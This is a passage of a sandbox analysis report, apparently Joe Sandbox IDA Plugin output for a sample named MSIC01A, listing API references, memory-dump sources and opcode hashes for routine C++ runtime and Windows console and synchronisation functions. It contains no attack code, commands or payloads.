                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42899
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F428B9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E974
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E97E
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E9CF
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E9EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EA09
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EA13
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EA64
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EA84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                        • Instruction ID: 28f1b08247a5bc8eb2730b30590a1217b8c568395f9a8e7cf4e887dd2bdec752
                                                                                                                                                                        • Opcode Fuzzy Hash: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8801C031900219DBCB05EB648C456BE7B60BF84730F2A0909F900AB3D2CF7C9E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EBC8
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EBD2
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EC23
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EC43
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                        • Instruction ID: ef79ea34dee95957e4b35d77ce56ad2102214fc497a9e6662f94e52ae458c276
                                                                                                                                                                        • Opcode Fuzzy Hash: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                        • Instruction Fuzzy Hash: B001C431900119DBCB15EB648C466BE7B70BF80760F240449FA146B2D2CF789E05E791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42BBC
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42BC6
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42C17
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42C37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                        • Instruction ID: d8490209b1eec59f888a2a37465c2e5511af13464640d3a5ec6d586248030a21
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3501C431900619DBCB15FBA49C416BE7B70AF80730F254419FA106B2D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42CE6
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42CF0
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42D41
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42D61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                        • Instruction ID: 0530460ec83afea53cf67d2400ab243ccd203f0cb20771b4071cf2379c38bcd3
                                                                                                                                                                        • Opcode Fuzzy Hash: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                        • Instruction Fuzzy Hash: 4101AD31D00219DBCB15EB649C41AAE7B71BF84720F240559F9046B2D2CFB89E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EC5D
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EC67
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4ECB8
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4ECD8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                        • Instruction ID: af0b257b97dee98e9525ceafa08473e3e5088e3e08a5ce97722b63d61d6fb2db
                                                                                                                                                                        • Opcode Fuzzy Hash: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9801AD31D00219DBCB05AB649C81AAE7B71BF80770F250409FA056B2D2CF789A05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42C51
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42C5B
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42CAC
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42CCC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                        • Instruction ID: 18066facfc310acf9f892b381b8357230f48d7354ae179bb3c25c57d427d0f86
                                                                                                                                                                        • Opcode Fuzzy Hash: 1067678da9da8b224384e56479c4edb1ad803cfbbba5ebc044502e784d1f4d2f
                                                                                                                                                                        • Instruction Fuzzy Hash: DA01C035901219DBCB15EBA89C816BE7BA0AF80730F250419FA106B3D2CF789E01BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42EA5
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42EAF
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42F00
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42F20
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                        • Instruction ID: af66b203ffaf989b298bd33322cc3cd7dcddd86842dfad7460ed29276f719b0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 593ef2adb51cacdf4f9a065b53df5ffaceb238e0abfb2c69f02224e7bcbb619a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A01D231900219DBCB05EB64DC41ABE7B70BF80720F640459F914AB2D2CF789E05FB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42E10
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42E1A
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42E6B
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42E8B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                        • Instruction ID: 42cd417f7ed3b727901e139567ca4c4debd4a8afeb01891daa9667f7a953831a
                                                                                                                                                                        • Opcode Fuzzy Hash: da6f2a6c327c3850944594b39d306414b56ba4033021874b4c2fec8719f6127f
                                                                                                                                                                        • Instruction Fuzzy Hash: C701C432900619DBCB05EB64CC41ABE7B61BF94760F240959FD146B2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42F3A
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42F44
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42F95
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42FB5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                        • Instruction ID: d273f61df5bbd8bce04d0fc89b86185f8265fea8a235cc7fd53743a7070d9db4
                                                                                                                                                                        • Opcode Fuzzy Hash: 7325409ab48030eec458f766c0680f65d1f0d6fe7bc8787080a7118726776d40
                                                                                                                                                                        • Instruction Fuzzy Hash: 6101C431A00519DBCB05EBA49C416BEBB71BF84730F640559F9046B3D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000), ref: 00F7369D
                                                                                                                                                                        • GetLastError.KERNEL32(?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?,?,00F7271F,?), ref: 00F736A9
                                                                                                                                                                          • Part of subcall function 00F7366F: CloseHandle.KERNEL32(FFFFFFFE,00F736B9,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?,?), ref: 00F7367F
                                                                                                                                                                        • ___initconout.LIBCMT ref: 00F736B9
                                                                                                                                                                          • Part of subcall function 00F73631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F73660,00F73040,?,?,00F72198,?,?,00000000,?), ref: 00F73644
                                                                                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00F73053,?,00000001,?,?,?,00F72198,?,?,00000000,?), ref: 00F736CE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                        • Opcode ID: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                        • Instruction ID: f5ca51e0338b9d00041cd7796d80c5cdc0057c86349d89a1316fcabd0ae4d597
                                                                                                                                                                        • Opcode Fuzzy Hash: 7600343d96cf7cbcfadc6a4d8b011323be3dce8e084e2842d37f7c7539e989d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 4FF0AC3651425CBBCF626F95EC05D993F66FB087B1B448061FE1D96220D6328960FB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,00F52CBD,00000064), ref: 00F52D43
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D4D
                                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D5E
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00F8DD3C,?,00F52CBD,00000064,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52D65
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3269011525-0
                                                                                                                                                                        • Opcode ID: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                        • Instruction ID: e2d7ead1b0fd70ef689d82a66bbe3cec9c82fbd8f237ffe6eb7588f862aafd12
                                                                                                                                                                        • Opcode Fuzzy Hash: adac9c210c07a0ec124efee90b6e29fa1af94c85e0af973fd1d756bd85735b26
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DE0123355562CBBCB163B54EC08ADA7F39BF05B61B010051FA0A661B2D7615941BBD3
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F3EC8E
                                                                                                                                                                          • Part of subcall function 00F3D87C: __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                          • Part of subcall function 00F3D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                          • Part of subcall function 00F3D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F3EE8A
                                                                                                                                                                        Strings
                                                                                                                                                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 00F3ECF6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
